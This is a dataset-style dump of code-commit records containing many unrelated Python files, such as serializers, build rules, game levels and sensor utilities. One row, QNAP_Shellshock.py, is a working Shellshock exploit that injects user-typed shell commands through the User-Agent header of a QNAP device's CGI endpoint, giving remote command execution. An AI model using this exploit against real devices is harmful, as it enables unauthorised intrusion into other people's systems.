commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
238d031651cb74d0ca9bed9d38cda836049c9c37 | Correct fallback for tag name | src/sentry/api/serializers/models/grouptagkey.py | src/sentry/api/serializers/models/grouptagkey.py | from __future__ import absolute_import
from sentry.api.serializers import Serializer, register
from sentry.models import GroupTagKey, TagKey
@register(GroupTagKey)
class GroupTagKeySerializer(Serializer):
def get_attrs(self, item_list, user):
tag_labels = {
t.key: t.get_label()
for t in TagKey.objects.filter(
project=item_list[0].project,
key__in=[i.key for i in item_list]
)
}
result = {}
for item in item_list:
try:
label = tag_labels[item.key]
except KeyError:
if item.key.startswith('sentry:'):
label = item.key.split('sentry:', 1)[-1]
else:
label = item.key
result[item] = {
'name': label,
}
return result
def serialize(self, obj, attrs, user):
if obj.key.startswith('sentry:'):
key = obj.key.split('sentry:', 1)[-1]
else:
key = obj.key
return {
'name': attrs['name'],
'key': key,
'uniqueValues': obj.values_seen,
}
| from __future__ import absolute_import
from sentry.api.serializers import Serializer, register
from sentry.models import GroupTagKey, TagKey
@register(GroupTagKey)
class GroupTagKeySerializer(Serializer):
def get_attrs(self, item_list, user):
tag_labels = {
t.key: t.get_label()
for t in TagKey.objects.filter(
project=item_list[0].project,
key__in=[i.key for i in item_list]
)
}
result = {}
for item in item_list:
try:
label = tag_labels[item.key]
except KeyError:
label = item.value
result[item] = {
'name': label,
}
return result
def serialize(self, obj, attrs, user):
if obj.key.startswith('sentry:'):
key = obj.key.split('sentry:', 1)[-1]
else:
key = obj.key
return {
'name': attrs['name'],
'key': key,
'uniqueValues': obj.values_seen,
}
| Python | 0.000005 |
bc3495acdc9f53e2fa7d750f3dd7bb53826326e3 | Create csvloader.py | csvloader.py | csvloader.py | import random
import csv
with open('points.csv', 'wb') as csvfile:
writer = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)
row = []
for i in range(1000):
row.append(random.randrange(-2000,1000))
row.append(random.randrange(20,1000))
row.append(random.randrange(0,3))
writer.writerow(row)
row = []
| Python | 0.000053 | |
8fe27d56592978a0d2a2e43b07214f982bad2010 | Add intermediate tower 8 | pythonwarrior/towers/intermediate/level_008.py | pythonwarrior/towers/intermediate/level_008.py | # -------
# |@ Ss C>|
# -------
level.description("You discover a satchel of bombs which will help "
"when facing a mob of enemies.")
level.tip("Detonate a bomb when you see a couple enemies ahead of "
"you (warrior.look()). Watch out for your health too.")
level.clue("Calling warrior.look() will return an array of Spaces. If the "
"first two contain enemies, detonate a bomb with "
"warrior.detonate_().")
level.time_bonus(30)
level.size(7, 1)
level.stairs(6, 0)
def add_war_abilities(warrior):
warrior.add_abilities('look', 'detonate_')
level.warrior(0, 0, 'east', func=add_war_abilities)
def add_captive_abilities(unit):
unit.add_abilities('explode_')
unit.abilities_attr['explode_'].time = 9
level.unit('captive', 5, 0, 'west', func=add_captive_abilities)
level.unit('thick_sludge', 2, 0, 'west')
level.unit('sludge', 3, 0, 'west')
| Python | 0.998595 | |
5e9c0961c381dcebe0331c8b0db38794de39300b | Initialize P01_fantasy_game_inventory | books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py | books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py | # This program models a player's inventory from a fantasy game
# You are creating a fantasy video game. The data structure to model the player’s
# inventory will be a dictionary where the keys are string values describing the item
# in the inventory and the value is an integer value detailing how many of that item
# the player has.
#
# For example, the dictionary value
# {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
# means the player has 1 rope, 6 torches, 42 gold coins, and so on.
#
# Write a function named displayInventory() that would take any possible “inventory”
# and display it like the following:
# Inventory:
# 12 arrow
# 42 gold coin
# 1 rope
# 6 torch
# 1 dagger
#
# Total number of items: 62
stuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
def displayInventory(inventory):
print("Inventory:")
item_total = 0
for k, v in inventory.items():
# FILL THIS PART IN
print("Total number of items: " + str(item_total))
displayInventory(stuff)
| Python | 0.000004 | |
b50811f87d10dab0768feed293e239ca98a91538 | fix issue with ptu server and morse topic by correcting and republishing /ptu/state | topic_republisher/scripts/republish_ptu_state.py | topic_republisher/scripts/republish_ptu_state.py | #!/usr/bin/env python
import rospy
from sensor_msgs.msg import JointState
class JointStateRepublisher():
"A class to republish joint state information"
def __init__(self):
rospy.init_node('ptu_state_republisher')
self.pub = rospy.Publisher('/ptu/state', JointState)
rospy.Subscriber("/ptu_state", JointState, self.callback)
rospy.loginfo(rospy.get_name() + " setting up")
def callback(self,data):
rospy.logdebug(rospy.get_name() + ": I heard %s, %s", data.name, data.position)
pan_idx = data.name.index('pan')
tilt_idx = data.name.index('tilt')
js = JointState()
js.header = data.header
js.name.append(data.name[pan_idx])
js.name.append(data.name[tilt_idx])
js.position.append(data.position[pan_idx])
js.position.append(data.position[tilt_idx])
self.pub.publish(js)
if __name__ == '__main__':
republisher = JointStateRepublisher()
rospy.spin()
| Python | 0 | |
007b2d2ce61864e87de368e508fa971864847fc7 | Create findPrimes.py | findPrimes.py | findPrimes.py | # Tyler Witt
# findPrimes.py
# 6.27.14
# ver 1.0
# This function implements the Sieve of Eratosthenes algorithm to find all the prime numbers below lim
def findPrimes(lim):
primes = []
cur = 0
if lim < 2:
return None
for num in range(2, lim + 1):
primes.append(num)
while (primes[cur] ** 2 < lim):
for val in primes:
if val % primes[cur] == 0 and val != primes[cur]:
primes.remove(val)
cur += 1
return (primes)
| Python | 0 | |
80f294e134ef684feb8ac700747a65522edf8758 | add new example in the gallery | examples/plot_kraken.py | examples/plot_kraken.py | """
Kraken module example
=======================
kraken module showing distribution of the most frequent taxons
Please, see :mod:`sequana.kraken` for more information and the
quality_taxon pipeline module or kraken rule.
"""
#This plots a simple taxonomic representation of the output
#of the taxonomic pipeline. A more complete and interactive
#representatino using krona is available when using the
#quality_taxon pipeline in Sequana.
##############################################
# test
from sequana import KrakenContaminant
k = KrakenContaminant("kraken.out", verbose=False)
k.plot(kind='pie')
####################################################
# The input file **kraken.out** is the output of the
# Kraken tool. It is a ste of rows such as those ones::
#
# C HISEQ:426:C5T65ACXX:5:2301:5633:7203 11234 203 0:2 11234:1 0:1 11234:1 0:2 11234:1 0:13 11234:1 0:1 11234:1 0:3 11234:1 0:16 11234:1 0:5 11234:1 0:6 11234:1 0:13 A:31 0:33 11234:1 0:29 11234:1 0:7
# C HISEQ:426:C5T65ACXX:5:2301:5815:7120 11234 203 0:4 11234:1 0:12 11234:1 0:22 11234:1 0:1 0 11234:1 0:5 11234:1 0:7 11234:1 0:5 A:31 0:3 11234:1 0:22 11234:1 0:18 11234:1 0:24 11234:1
#
#
# The KrakenContaminant class will read the file, download a taxonomic database
# from EBI, map the taxon found in the **kraken.out** file and figure out the
# lineage. In the example above, only the scientific name is found. In the
# snakefile provided in Sequana, the full pipeline produces a full lineage
# representation using krona tool.
#
# .. seealso:: :ref:`pipelines`
| Python | 0 | |
341ca75484b4607eb632d52bf257c8190ebf8a3b | Create fishspine3.py | fishspine3.py | fishspine3.py | #Fish vertebral location code
| Python | 0.000005 | |
653ab8128de3c08b6b8be0d662f12ef5a3edf6b2 | Add grafana build rule | shipyard/rules/third-party/grafana/build.py | shipyard/rules/third-party/grafana/build.py | from foreman import get_relpath, rule
from garage import scripts
from templates.common import define_distro_packages
GRAFANA_DEB = 'grafana_5.1.4_amd64.deb'
GRAFANA_DEB_URI = 'https://s3-us-west-2.amazonaws.com/grafana-releases/release/grafana_5.1.4_amd64.deb'
GRAFANA_DEB_CHECKSUM = 'sha256-bbec4cf6112c4c2654b679ae808aaad3b3e4ba39818a6d01f5f19e78946b734e'
define_distro_packages([
'adduser',
'libfontconfig',
])
@rule
@rule.depend('//base:build')
@rule.depend('install_packages')
def build(parameters):
drydock_src = parameters['//base:drydock'] / get_relpath()
scripts.mkdir(drydock_src)
with scripts.directory(drydock_src):
deb_path = drydock_src / GRAFANA_DEB
if not deb_path.exists():
scripts.wget(GRAFANA_DEB_URI, deb_path)
scripts.ensure_checksum(deb_path, GRAFANA_DEB_CHECKSUM)
with scripts.using_sudo():
scripts.execute(['dpkg', '--install', deb_path])
@rule
@rule.depend('build')
@rule.reverse_depend('//base:tapeout')
def tapeout(parameters):
with scripts.using_sudo():
rootfs = parameters['//base:drydock/rootfs']
scripts.rsync(
[
'/usr/sbin/grafana-server',
'/usr/share/grafana',
],
rootfs,
relative=True,
)
@rule
@rule.depend('//base:tapeout')
def trim_usr(parameters):
rootfs = parameters['//base:drydock/rootfs']
with scripts.using_sudo():
scripts.rm(rootfs / 'usr/lib', recursive=True)
scripts.rm(rootfs / 'usr/local/lib', recursive=True)
| Python | 0.000001 | |
1154fe470aaf4066c041b33c66bbfd46d9470b4a | Clean up existing BotTestExpectations unittests in preparation for adding more | Tools/Scripts/webkitpy/layout_tests/layout_package/bot_test_expectations_unittest.py | Tools/Scripts/webkitpy/layout_tests/layout_package/bot_test_expectations_unittest.py | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.layout_tests.layout_package import bot_test_expectations
class BotTestExpectationsTest(unittest.TestCase):
# Expects newest result on left of string "PFF", means it just passed after 2 failures.
def _results_from_string(self, results_string):
results_list = []
last_char = None
for char in results_string:
if char != last_char:
results_list.insert(0, [1, char])
else:
results_list[0][0] += 1
return {'results': results_list}
def _assert_expectations(self, expectations, test_data, expectations_string):
output = expectations._generate_expectations_string(test_data)
self.assertMultiLineEqual(output, expectations_string)
def test_basic(self):
test_data = {
'tests': {
'foo': {
'veryflaky.html': self._results_from_string('FPFP'),
'maybeflaky.html': self._results_from_string('PPFP'),
'notflakypass.html': self._results_from_string('PPPP'),
'notflakyfail.html': self._results_from_string('FFFF'),
}
}
}
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
self._assert_expectations(expectations, test_data, """Bug(auto) foo/veryflaky.html [ Failure Pass ]""")
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=False)
self._assert_expectations(expectations, test_data, """Bug(auto) foo/veryflaky.html [ Failure Pass ]
Bug(auto) foo/maybeflaky.html [ Failure Pass ]""")
def test_all_failure_types(self):
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
test_data = {
'tests': {
'foo': {
'allfailures.html': self._results_from_string('FPFPCNCNTXTXIZIZOCOC'),
'imageplustextflake.html': self._results_from_string('ZPZPPPPPPPPPPPPPPPPP'),
}
}
}
self._assert_expectations(expectations, test_data, """Bug(auto) foo/imageplustextflake.html [ Failure Pass ]
Bug(auto) foo/allfailures.html [ Crash Missing ImageOnlyFailure Failure Timeout Pass ]""")
| # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.layout_tests.layout_package import bot_test_expectations
class BotTestExpectationsTest(unittest.TestCase):
def test_basic(self):
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
test_data = {
'tests': {
'foo': {
'veryflaky.html': {
'results': [[1, 'F'], [1, 'P'], [1, 'F'], [1, 'P']]
},
'maybeflaky.html': {
'results': [[3, 'P'], [1, 'F'], [3, 'P']]
},
'notflakypass.html': {
'results': [[4, 'P']]
},
'notflakyfail.html': {
'results': [[4, 'F']]
},
}
}
}
output = expectations._generate_expectations_string(test_data)
expected_output = """Bug(auto) foo/veryflaky.html [ Failure Pass ]"""
self.assertMultiLineEqual(output, expected_output)
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=False)
output = expectations._generate_expectations_string(test_data)
expected_output = """Bug(auto) foo/veryflaky.html [ Failure Pass ]
Bug(auto) foo/maybeflaky.html [ Failure Pass ]"""
self.assertMultiLineEqual(output, expected_output)
def test_all_failure_types(self):
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
test_data = {
'tests': {
'foo': {
'allfailures.html': {
'results': [[1, 'F'], [1, 'P'], [1, 'F'], [1, 'P'],
[1, 'C'], [1, 'N'], [1, 'C'], [1, 'N'],
[1, 'T'], [1, 'X'], [1, 'T'], [1, 'X'],
[1, 'I'], [1, 'Z'], [1, 'I'], [1, 'Z'],
[1, 'O'], [1, 'C'], [1, 'O'], [1, 'C']]
},
'imageplustextflake.html': {
'results': [[1, 'Z'], [1, 'P'], [1, 'Z'], [1, 'P']]
},
}
}
}
output = expectations._generate_expectations_string(test_data)
expected_output = """Bug(auto) foo/imageplustextflake.html [ Failure Pass ]
Bug(auto) foo/allfailures.html [ Crash Missing ImageOnlyFailure Failure Timeout Pass ]"""
self.assertMultiLineEqual(output, expected_output)
| Python | 0.000001 |
4dd0b349f971cd5ba4842f79a7dba36bf4999b6f | Add Jmol package (#3041) | var/spack/repos/builtin/packages/jmol/package.py | var/spack/repos/builtin/packages/jmol/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from distutils.dir_util import copy_tree
class Jmol(Package):
"""Jmol: an open-source Java viewer for chemical structures in 3D
with features for chemicals, crystals, materials and biomolecules."""
homepage = "http://jmol.sourceforge.net/"
url = "https://sourceforge.net/projects/jmol/files/Jmol/Version%2014.8/Jmol%2014.8.0/Jmol-14.8.0-binary.tar.gz"
version('14.8.0', '3c9f4004b9e617ea3ea0b78ab32397ea')
depends_on('jdk', type='run')
def install(self, spec, prefix):
copy_tree('jmol-{0}'.format(self.version), prefix)
def setup_environment(self, spack_env, run_env):
run_env.prepend_path('PATH', self.prefix)
run_env.set('JMOL_HOME', self.prefix)
| Python | 0 | |
dc635babcf78343bf9490a77d716db89bda2698b | Create __init__.py | api_1_0/__init__.py | api_1_0/__init__.py | from flask import Blueprint
api = Blueprint('api', __name__)
from . import authentication, posts, users, comments, errors
| Python | 0.000429 | |
7d29c44e19c1f06deb0722a3df51501b39566c4b | Implement simple en/decoding command line tool | flynn/tool.py | flynn/tool.py | # coding: utf-8
import sys
import argparse
import flynn
import json
def main(args=sys.argv[1:]):
formats = {"json", "cbor", "cbori", "cborh", "cborhi"}
argparser = argparse.ArgumentParser()
argparser.add_argument("-i", "--input-format", choices=formats, default="cbor")
argparser.add_argument("-o", "--output-format", choices=formats, default="cbor")
args = argparser.parse_args(args)
if args.input_format in {"cbor", "cbori"}:
input_format = "cbor"
else:
input_format = args.input_format
output_format = args.output_format
intermediate = None
if input_format in {"cbor", "cbori"}:
intermediate = flynn.load(sys.stdin.raw)
elif input_format in {"cborh", "cborhi"}:
intermediate = flynn.loadh(sys.stdin.read())
elif input_format == "json":
intermediate = json.load(sys.stdin)
if output_format == "cbor":
flynn.dump(intermediate, sys.stdout.raw)
elif output_format == "cbori":
flynn.dump(intermediate, sys.stdout.raw, cls=flynn.encoder.InfiniteEncoder)
elif output_format == "cborh":
sys.stdout.write(flynn.dumph(intermediate))
elif output_format == "cborhi":
sys.stdout.write(flynn.dumph(intermediate, cls=flynn.encoder.InfiniteEncoder))
elif output_format == "json":
json.dump(intermediate, sys.stdout)
if __name__ == "__main__":
main()
| Python | 0.000108 | |
5af92f3905f2d0101eeb42ae7cc51bff528ea6ea | Write bodies given by coordinates to a VTK file | syngeo/io.py | syngeo/io.py | # stardard library
import sys, os
# external libraries
import numpy as np
from ray import imio, evaluate
def add_anything(a, b):
return a + b
def write_synapse_to_vtk(neurons, coords, fn, im=None, t=(2,0,1), s=(1,-1,1),
margin=None):
"""Output neuron shapes around pre- and post-synapse coordinates.
The coordinate array is a (n+1) x m array, where n is the number of
post-synaptic sites (fly neurons are polyadic) and m = neurons.ndim, the
number of dimensions of the image.
"""
neuron_ids = neurons[zip(*(coords[:,t]*s))]
synapse_volume = reduce(add_anything,
[(i+1)*(neurons==j) for i, j in enumerate(neuron_ids)])
imio.write_vtk(synapse_volume, fn)
if im is not None:
imio.write_vtk(im,
os.path.join(os.path.dirname(fn), 'image.' + os.path.basename(fn)))
| Python | 0.000001 | |
e6e90cef36551796f7fb06585c67508538ce113f | Create MaxCounters.py | Counting-Elements/MaxCounters.py | Counting-Elements/MaxCounters.py | # https://codility.com/demo/results/trainingTC7JSX-8E9/
def solution(N, A):
counters = N * [0]
max_counters = 0
for elem in A:
if elem == N+1:
counters = N * [max_counters]
else:
this_elem = counters[elem-1] + 1
counters[elem-1] = this_elem
if this_elem > max_counters:
max_counters = this_elem
return counters
| Python | 0 | |
ce1d13bc6827f780e44491b630e64df7b52634f1 | add vibration sensor code | gpio/vibration-sendor-test.py | gpio/vibration-sendor-test.py | import RPi.GPIO as GPIO
import time
import datetime
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
IN_PIN = 18
LED_PIN = 17
GPIO.setup(IN_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(LED_PIN, GPIO.OUT)
GPIO.output(LED_PIN, GPIO.LOW)
def turn_on(led_pin):
GPIO.output(led_pin, GPIO.HIGH)
def turn_off(led_pin):
GPIO.output(led_pin, GPIO.LOW)
count = 0
while True:
i=GPIO.input(IN_PIN)
if(count == 1000):
turn_off(LED_PIN)
count += 1
if i==1:
print(datetime.datetime.now(), "Vibration detected",i)
time.sleep(0.1)
count = 0
turn_on(LED_PIN)
| Python | 0 | |
e7ef1806f84e6d07ef88ca23444f37cf6f50e014 | Add a console-less version. | wxMailServer.pyw | wxMailServer.pyw | # -*- encoding: utf-8 -*-
from wxMailServer import main
if __name__ == "__main__":
main() | Python | 0 | |
b419f8c9f562d3d16a6079e949c47ec2adc4c97d | add utility script for merging test files | scripts/merge-tests.py | scripts/merge-tests.py | import sys
c_includes = set()
cxx_includes = set()
jive_includes = set()
local_includes = set()
code_blocks = []
def mangle(fname):
name = fname[6:-2]
name = name.replace('/', '_')
name = name.replace('-', '_')
return name
for fname in sys.argv[1:]:
seen_includes = False
code_lines = []
name = mangle(fname)
for line in file(fname).readlines():
line = line[:-1]
if line[:9] == "#include ":
include = line[9:]
if include[:6] == "<jive/":
jive_includes.add(include)
elif include[-3:] == ".h>":
c_includes.add(include)
elif include[0] == '"':
local_includes.add(include)
else:
cxx_includes.add(include)
seen_includes = True
continue
if not seen_includes: continue
line = line + '\n'
if line == '\n' and code_lines and code_lines[-1] == '\n':
continue
line = line.replace('test_main', name)
code_lines.append(line)
code_blocks.append(''.join(code_lines))
out = sys.stdout
if local_includes:
for i in sorted(local_includes): out.write('#include %s\n' % i)
out.write('\n')
if c_includes:
for i in sorted(c_includes): out.write('#include %s\n' % i)
out.write('\n')
if cxx_includes:
for i in sorted(cxx_includes): out.write('#include %s\n' % i)
out.write('\n')
if jive_includes:
for i in sorted(jive_includes): out.write('#include %s\n' % i)
out.write('\n')
for c in code_blocks: out.write(c)
| Python | 0 | |
62e17c30ba45458254c0da5b14582aeeac9eab4c | Add command to pre-generate all jpeg images | signbank/video/management/commands/makejpeg.py | signbank/video/management/commands/makejpeg.py | """Convert a video file to flv"""
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from signbank.video.models import GlossVideo
import os
class Command(BaseCommand):
help = 'Create JPEG images for all videos'
args = ''
def handle(self, *args, **options):
# just access the poster path for each video
for vid in GlossVideo.objects.all():
p = vid.poster_path()
print p
else:
print "Usage makejpeg"
| Python | 0.000001 | |
83d8199eccf7261a8e2f01f7665537ee31702f8c | Create QNAP_Shellshock.py | QNAP_Shellshock.py | QNAP_Shellshock.py | #!/usr/bin/python
import socket
print "QNAP exploit!"
inputstr=""
ip="x.x.x.x" #Change IP Value
port=8080
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
inputstr=raw_input("cmd> ")
s.connect(ip,port))
s.send("GET /cgi-bin/index.cgi HTTP/1.0\nHost: "+ip+"\nUser-Agent: () { :;}; echo; "+inputstr+"\r\n\r\n")
output=""
while True:
buf=s.recv(4096)
if not buf:
break
output+=buf
indexHTML= output.find("html")
print output[0:indexHTML]
s.close()
| Python | 0.000001 | |
444efa0506034302b605107981b0db4b8d2c37cc | task urls | task/urls.py | task/urls.py | from django.conf.urls import patterns, include, url
from task.views import Home, TaskView, TaskDetail
urlpatterns = patterns(
'',
url(r'^$', Home.as_view(), name='home'),
url(r'^task/$', TaskView.as_view(), name='task'),
url(r'^task/(?P<pk>\d+)/$', TaskDetail.as_view(), name='task_detail'),
)
| Python | 0.999783 | |
63c2c7a696aedb1b08d2478a2b84aec42f4364cf | Add tests for URLConverter | tests/bucket/test_url_converter.py | tests/bucket/test_url_converter.py | from mrs.bucket import URLConverter
def test_local_to_global():
c = URLConverter('myhost', 42, '/my/path')
url = c.local_to_global('/my/path/xyz.txt')
assert url == 'http://myhost:42/xyz.txt'
def test_local_to_global_outside_dir():
c = URLConverter('myhost', 42, '/my/path')
url = c.local_to_global('/other/path/xyz.txt')
assert url == '/other/path/xyz.txt'
def test_global_to_local():
c = URLConverter('myhost', 42, '/my/path')
master = 'server:8080'
url = c.global_to_local('http://myhost:42/xyz.txt', master)
assert url == '/my/path/xyz.txt'
def test_global_to_local_other():
c = URLConverter('myhost', 42, '/my/path')
master = 'server:8080'
url = c.global_to_local('http://other:443/xyz.txt', master)
assert url == 'http://other:443/xyz.txt'
def test_global_to_local_master():
c = URLConverter('myhost', 42, '/my/path')
master = 'server:8080'
url = c.global_to_local('http:///xyz.txt', master)
assert url == 'http://server:8080/xyz.txt'
# vim: et sw=4 sts=4
| Python | 0 | |
88cf8e30da6ab655dfc31b2fd88d26ef649e127d | add sha digest tool | getDigest.py | getDigest.py | #!/usr/bin/env python
# encoding: utf-8
import sys
import hashlib
def getDigest(file):
# BUF_SIZE is totally arbitrary, change for your app!
BUF_SIZE = 65536 # lets read stuff in 64kb chunks!
md5 = hashlib.md5()
sha1 = hashlib.sha1()
with open(file, 'rb') as f:
while True:
data = f.read(BUF_SIZE)
if not data:
break
md5.update(data)
sha1.update(data)
print("MD5: {0}".format(md5.hexdigest()))
print("SHA1: {0}".format(sha1.hexdigest()))
def main(argv):
getDigest(argv)
if __name__ == '__main__':
sys.exit(main(sys.argv[1]))
| Python | 0 | |
e9acbc2e1423084ddd4241e2fbdcc7fcbf02ad6d | add empty migration as data migration | coupons/migrations/0005_auto_20151105_1502.py | coupons/migrations/0005_auto_20151105_1502.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coupons', '0004_auto_20151105_1456'),
]
operations = [
]
| Python | 0.000007 | |
3004dec0e0deadc4df61bafb233cd6b277c9bfef | Add in small utility that creates an index on the MongoDB collection, specifically on the Steam ID number key | util/create_mongodb_index.py | util/create_mongodb_index.py | #!/usr/env python3.4
import sys
from pymongo import ASCENDING
from util.mongodb import connect_to_db
from argparse import (ArgumentParser,
ArgumentDefaultsHelpFormatter)
def main(argv=None):
parser = ArgumentParser(description='Run incremental learning '
'experiments.',
formatter_class=ArgumentDefaultsHelpFormatter,
conflict_handler='resolve')
parser.add_argument('-dbhost', '--mongodb_host',
help='Host that the MongoDB server is running on.',
type=str,
default='localhost')
parser.add_argument('--mongodb_port', '-dbport',
help='Port that the MongoDB server is running on.',
type=int,
default=37017)
args = parser.parse_args()
# Connect to MongoDB database
print('Connecting to MongoDB database at {}:{}...'
.format(args.mongodb_host,
args.mongodb_port),
file=sys.stderr)
db = connect_to_db(args.mongodb_host,
args.mongodb_port)
# Create index on 'steam_id_number' so that cursors can be sorted
# on that particular key
print('Creating index on the "steam_id_number" key...',
file=sys.stderr)
db.create_index('steam_id_number', ASCENDING)
print('Created new index "steam_id_number_1" in reviews '
'collection.',
file=sys.stderr)
| Python | 0 | |
3da9953aa453281fd55ada75b2ed40fce8d9df6c | Create screen_op.py | screen_op.py | screen_op.py | #-------------------------------------------------------------------------------
#
# Controls shed weather station
#
# The MIT License (MIT)
#
# Copyright (c) 2015 William De Freitas
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#-------------------------------------------------------------------------------
#!usr/bin/env python
#===============================================================================
# Import modules
#===============================================================================
import os
import settings as s
#===============================================================================
# DRAW SCREEN
#===============================================================================
def draw_screen(sensors, thingspeak_enable, key, rrd_enable, rrd_set):
    """Clear the terminal and draw the weather-station status header.

    Args:
        sensors: mapping of sensor name -> tuple-like config; element
            s.TS_FIELD is the thingspeak field number, s.VALUE the last
            reading and s.UNIT its unit (indices come from settings).
        thingspeak_enable: show the thingspeak configuration section.
        key: thingspeak write API key (string).
        rrd_enable: show the RRDtool configuration section.
        rrd_set: iterable whose elements are appended (extended) onto the
            display -- assumed to be lists of strings; TODO confirm.

    Returns:
        Number of terminal rows left below the header for live data.
    """
    os.system('clear')
    display_string = []
    display_string.append('WEATHER STATION')
    display_string.append('')
    display_string.append('Next precip. acc. reset at '+ str(s.PRECIP_ACC_RESET_TIME))
    # Sort sensors once by display order (first element of the config tuple);
    # the original re-sorted for every section.
